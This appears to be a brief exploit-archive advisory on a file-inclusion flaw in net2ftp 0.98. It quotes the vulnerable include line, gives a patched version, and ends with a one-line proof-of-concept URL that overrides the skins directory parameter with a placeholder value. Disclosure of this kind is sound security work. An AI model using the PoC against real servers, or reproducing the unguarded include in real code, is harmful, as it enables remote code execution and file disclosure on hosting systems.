ExploitFixes
net2ftp Stable 0.98 RFI/LFI Vulnerability 2010-12-09 15:15:12

net2ftp is web based ftp client used by many web shared hosting
////////////////////////////////////////////////////////////////////
Vuln is in file skins/mobile/admin1.template.php:

<?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>

///////////////////////////////////////////////////////////////////
Pathed Version:
<?php
defined("NET2FTP") or die("Direct access to this location is not allowed.");
require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php");
?>

//////////////////////////////////////////////////////////////////
POC:
http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil